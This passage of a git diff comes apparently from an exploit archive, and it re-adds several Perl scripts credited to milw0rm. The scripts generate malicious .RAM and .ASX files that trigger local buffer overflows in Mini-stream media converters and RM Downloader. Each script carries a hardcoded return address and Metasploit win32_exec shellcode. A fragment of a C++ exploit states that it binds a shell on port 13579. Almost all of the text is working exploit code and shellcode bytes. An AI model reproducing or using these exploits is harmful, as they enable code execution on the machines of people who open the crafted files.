- "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". - "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; - - open(RAM,'>>gnk.ram'); - print RAM $MSD.$RA.$SMN.$Shcode; - close(RAM); - -# milw0rm.com [2009-05-07] +#!/usr/bin/perl +=gnk +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\...From Iran + +============================================================================== + RM Downloader 3.0.0.9 (.RAM) Local Buffer Overflow Exploit +============================================================================== + [»] Script:.............[ RM Downloader 3.0.0.9 ]....................... + [»] Website:............[ http://mini-stream.net/ ]..................... + [»] Today:..............[ 07052009 ].................................... + [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... +============================================================================== + + [x] tested on "Windows XP SP2"... [:-) + +=cut + +my $MSD = "rtsp://"."G" x 26117; +my $SMN = "\x90" x 16; +my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". + "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". + "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". + "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". + "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". 
+ "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". + "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". + "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". + "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". + "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; + + open(RAM,'>>gnk.ram'); + print RAM $MSD.$RA.$SMN.$Shcode; + close(RAM); + +# milw0rm.com [2009-05-07] diff --git a/platforms/windows/local/8629.pl b/platforms/windows/local/8629.pl index b1e956006..a04d25850 100755 --- a/platforms/windows/local/8629.pl +++ b/platforms/windows/local/8629.pl 
@@ -1,50 +1,50 @@ -#!/usr/bin/perl -=gnk -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\...From Iran - -============================================================================== - Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit -============================================================================== - [»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ].... - [»] Website:............[ http://mini-stream.net/ ]..................... - [»] Today:..............[ 07052009 ].................................... - [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... -============================================================================== - - [x] tested on "Windows XP SP2"... [:-) - -=cut - -my $MSD = "rtsp://"."G" x 26117; -my $SMN = "\x90" x 16; -my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". - "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". - "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". - "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". - "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". - "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". - "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". - "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". 
- "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". - "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; - - open(RAM,'>>gnk.ram'); - print RAM $MSD.$RA.$SMN.$Shcode; - close(RAM); - -# milw0rm.com [2009-05-07] +#!/usr/bin/perl +=gnk +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\...From Iran + +============================================================================== + Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit +============================================================================== + [»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ].... + [»] Website:............[ http://mini-stream.net/ ]..................... + [»] Today:..............[ 07052009 ].................................... + [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... +============================================================================== + + [x] tested on "Windows XP SP2"... [:-) + +=cut + +my $MSD = "rtsp://"."G" x 26117; +my $SMN = "\x90" x 16; +my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". + "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". + "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". + "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". 
+ "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
+ "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
+ "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
+ "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
+ "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
+ "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
+
+ open(RAM,'>>gnk.ram');
+ print RAM $MSD.$RA.$SMN.$Shcode;
+ close(RAM);
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/863.cpp b/platforms/windows/local/863.cpp
index 4972954b0..ac4bf82ec 100755
--- a/platforms/windows/local/863.cpp
+++ b/platforms/windows/local/863.cpp
@@ -93,6 +93,6 @@ int main(int argc,char *argv[])
 }
 printf("File written.Binds a shell on port 13579.\nOpen with realplayer to exploit.\n");
 return 0;
-}
-
-// milw0rm.com [2005-03-07]
+}
+
+// milw0rm.com [2005-03-07]
diff --git a/platforms/windows/local/8630.pl b/platforms/windows/local/8630.pl
index 594378a45..4673dc1c6 100755
--- a/platforms/windows/local/8630.pl
+++ b/platforms/windows/local/8630.pl
@@ -1,63 +1,63 @@ -#!/usr/bin/perl -=gnk -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\...From Iran - -============================================================================== - Mini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit -============================================================================== - [»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ].... - [»] Website:............[ http://mini-stream.net/ ]..................... - [»] Today:..............[ 07052009 ].................................... - [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... -============================================================================== - - [x] tested on Windows XP SP2... - [x] if you are not able to make this shit work, just put it in the Base/Root - of a Drive/Partition, like "C:\gnk.asx"... - -=cut - -my $MSD = "G" x 26110; -my $SMN = "\x90" x 16; -my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". - "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". - "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". - "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". - "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". - "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". 
- "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". - "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". - "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". - "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; - -my $ASX = -"<asx version=\"3.0\"> - <title>Title is not important. - - Example... - - G4N0K - ©2009 G4N0K - -"; - - open(ASX,'>>gnk.asx'); - print ASX $ASX; - close(ASX); - -# milw0rm.com [2009-05-07] +#!/usr/bin/perl +=gnk +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\...From Iran + +============================================================================== + Mini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit +============================================================================== + [»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ].... + [»] Website:............[ http://mini-stream.net/ ]..................... + [»] Today:..............[ 07052009 ].................................... + [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... +============================================================================== + + [x] tested on Windows XP SP2... + [x] if you are not able to make this shit work, just put it in the Base/Root + of a Drive/Partition, like "C:\gnk.asx"... 
+ +=cut + +my $MSD = "G" x 26110; +my $SMN = "\x90" x 16; +my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". + "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". + "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". + "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". + "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". + "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". + "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". + "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". + "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". + "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; + +my $ASX = +" + Title is not important. + + Example... + + G4N0K + ©2009 G4N0K + +"; + + open(ASX,'>>gnk.asx'); + print ASX $ASX; + close(ASX); + +# milw0rm.com [2009-05-07] diff --git a/platforms/windows/local/8631.pl b/platforms/windows/local/8631.pl index f418b5a17..680c5680e 100755 --- a/platforms/windows/local/8631.pl +++ b/platforms/windows/local/8631.pl 
@@ -1,50 +1,50 @@ -#!/usr/bin/perl -=gnk -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\...From Iran - -============================================================================== - Mini-stream Ripper 3.0.1.1 (.RAM) Local Buffer Overflow Exploit -============================================================================== - [»] Script:.............[ Mini-stream Ripper 3.0.1.1 ].................. - [»] Website:............[ http://mini-stream.net/ ]..................... - [»] Today:..............[ 07052009 ].................................... - [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... -============================================================================== - - [x] tested on "Windows XP SP2"... [:-) - -=cut - -my $MSD = "rtsp://"."G" x 26117; -my $SMN = "\x90" x 16; -my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". - "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". - "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". - "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". - "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". - "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". - "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". - "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". 
- "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". - "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; - - open(RAM,'>>gnk.ram'); - print RAM $MSD.$RA.$SMN.$Shcode; - close(RAM); - -# milw0rm.com [2009-05-07] +#!/usr/bin/perl +=gnk +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\...From Iran + +============================================================================== + Mini-stream Ripper 3.0.1.1 (.RAM) Local Buffer Overflow Exploit +============================================================================== + [»] Script:.............[ Mini-stream Ripper 3.0.1.1 ].................. + [»] Website:............[ http://mini-stream.net/ ]..................... + [»] Today:..............[ 07052009 ].................................... + [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... +============================================================================== + + [x] tested on "Windows XP SP2"... [:-) + +=cut + +my $MSD = "rtsp://"."G" x 26117; +my $SMN = "\x90" x 16; +my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". + "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". + "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". + "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". + "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". 
+ "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". + "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". + "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". + "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". + "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; + + open(RAM,'>>gnk.ram'); + print RAM $MSD.$RA.$SMN.$Shcode; + close(RAM); + +# milw0rm.com [2009-05-07] diff --git a/platforms/windows/local/8632.pl b/platforms/windows/local/8632.pl index c60ea5573..c71611065 100755 --- a/platforms/windows/local/8632.pl +++ b/platforms/windows/local/8632.pl 
@@ -1,63 +1,63 @@ -#!/usr/bin/perl -=gnk -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\...From Iran - -============================================================================== - Mini-stream Ripper 3.0.1.1 .ASX File (HREF) Local Buffer Overflow Exploit -============================================================================== - [»] Script:.............[ Mini-stream Ripper 3.0.1.1 ].................. - [»] Website:............[ http://mini-stream.net/ ]..................... - [»] Today:..............[ 07052009 ].................................... - [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... -============================================================================== - - [x] tested on Windows XP SP2... - [x] if you are not able to make this shit work, just put it in the Base/Root - of a Drive/Partition, like "C:\gnk.asx"... - -=cut - -my $MSD = "G" x 26110; -my $SMN = "\x90" x 16; -my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". - "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". - "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". - "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". - "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". - "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". 
- "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". - "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". - "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". - "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; - -my $ASX = -" - Title is not important. - - Example... - - G4N0K - ©2009 G4N0K - -"; - - open(ASX,'>>gnk.asx'); - print ASX $ASX; - close(ASX); - -# milw0rm.com [2009-05-07] +#!/usr/bin/perl +=gnk +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\...From Iran + +============================================================================== + Mini-stream Ripper 3.0.1.1 .ASX File (HREF) Local Buffer Overflow Exploit +============================================================================== + [»] Script:.............[ Mini-stream Ripper 3.0.1.1 ].................. + [»] Website:............[ http://mini-stream.net/ ]..................... + [»] Today:..............[ 07052009 ].................................... + [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... +============================================================================== + + [x] tested on Windows XP SP2... + [x] if you are not able to make this shit work, just put it in the Base/Root + of a Drive/Partition, like "C:\gnk.asx"... 
+ +=cut + +my $MSD = "G" x 26110; +my $SMN = "\x90" x 16; +my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". + "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". + "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". + "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". + "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". + "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". + "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". + "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". + "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". + "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; + +my $ASX = +" + Title is not important. + + Example... + + G4N0K + ©2009 G4N0K + +"; + + open(ASX,'>>gnk.asx'); + print ASX $ASX; + close(ASX); + +# milw0rm.com [2009-05-07] diff --git a/platforms/windows/local/8633.pl b/platforms/windows/local/8633.pl index 75bbd1b29..2704d5f0a 100755 --- a/platforms/windows/local/8633.pl +++ b/platforms/windows/local/8633.pl 
@@ -1,50 +1,50 @@ -#!/usr/bin/perl -=gnk -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\...From Iran - -============================================================================== - Mini-stream RM-MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit -============================================================================== - [»] Script:.............[ Mini-stream RM-MP3 Converter 3.0.0.7 ]........ - [»] Website:............[ http://mini-stream.net/ ]..................... - [»] Today:..............[ 07052009 ].................................... - [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... -============================================================================== - - [x] tested on "Windows XP SP2"... [:-) - -=cut - -my $MSD = "rtsp://"."G" x 26117; -my $SMN = "\x90" x 16; -my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". - "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". - "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". - "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". - "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4". - "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6". - "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09". - "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea". 
- "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86". - "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82"; - - open(RAM,'>>gnk.ram'); - print RAM $MSD.$RA.$SMN.$Shcode; - close(RAM); - -# milw0rm.com [2009-05-07] +#!/usr/bin/perl +=gnk +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\...From Iran + +============================================================================== + Mini-stream RM-MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit +============================================================================== + [»] Script:.............[ Mini-stream RM-MP3 Converter 3.0.0.7 ]........ + [»] Website:............[ http://mini-stream.net/ ]..................... + [»] Today:..............[ 07052009 ].................................... + [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... +============================================================================== + + [x] tested on "Windows XP SP2"... [:-) + +=cut + +my $MSD = "rtsp://"."G" x 26117; +my $SMN = "\x90" x 16; +my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08". + "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7". + "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb". + "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f". 
